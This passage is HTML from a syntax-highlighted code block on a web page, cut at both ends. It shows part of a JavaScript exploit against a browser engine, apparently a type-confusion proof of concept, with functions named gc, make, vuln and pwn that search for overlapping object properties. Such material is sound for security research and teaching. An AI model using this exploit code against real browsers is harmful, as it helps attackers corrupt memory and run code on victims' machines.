class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;FAIL &#8216;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">throw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MAX_ITERATIONS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">100000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">gc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">make<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">properties<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">inline<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">42<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ TODO<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">properties<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pwn<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">find_overlapping_properties<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">propertyNames<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyNames<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-e\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">inline<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">propertyNames<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">map<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-e\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;n&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">propertyNames<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;, &#8216;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MAX_ITERATIONS<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">make<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span 